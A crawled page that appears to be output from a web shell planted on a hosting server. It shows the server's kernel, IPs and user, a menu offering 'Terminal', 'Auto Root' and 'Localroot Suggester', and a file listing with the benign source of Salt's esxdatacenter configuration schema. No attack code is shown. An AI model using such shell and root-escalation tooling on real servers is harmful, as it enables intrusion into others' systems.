Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python3.6 /
site-packages /
salt /
config /
schemas /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2022-10-11 05:09
__init__.py
171
B
-rw-r--r--
2022-05-16 09:16
common.py
1.58
KB
-rw-r--r--
2022-05-16 09:16
esxcluster.py
6.19
KB
-rw-r--r--
2022-05-16 09:16
esxdatacenter.py
1.01
KB
-rw-r--r--
2022-05-16 09:16
esxi.py
6.02
KB
-rw-r--r--
2022-05-16 09:16
esxvm.py
15.49
KB
-rw-r--r--
2022-05-16 09:16
minion.py
704
B
-rw-r--r--
2022-05-16 09:16
ssh.py
2.65
KB
-rw-r--r--
2022-05-16 09:16
vcenter.py
1.52
KB
-rw-r--r--
2022-05-16 09:16
Save
Rename
""" :codeauthor: :email:`Alexandru Bleotu (alexandru.bleotu@morganstanley.com)` salt.config.schemas.esxdatacenter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ESX Datacenter configuration schemas """ from salt.utils.schema import ArrayItem, IntegerItem, Schema, StringItem class EsxdatacenterProxySchema(Schema): """ Schema of the esxdatacenter proxy input """ title = "Esxdatacenter Proxy Schema" description = "Esxdatacenter proxy schema" additional_properties = False proxytype = StringItem(required=True, enum=["esxdatacenter"]) vcenter = StringItem(required=True, pattern=r"[^\s]+") datacenter = StringItem(required=True) mechanism = StringItem(required=True, enum=["userpass", "sspi"]) username = StringItem() passwords = ArrayItem(min_items=1, items=StringItem(), unique_items=True) # TODO Should be changed when anyOf is supported for schemas domain = StringItem() principal = StringItem() protocol = StringItem() port = IntegerItem(minimum=1)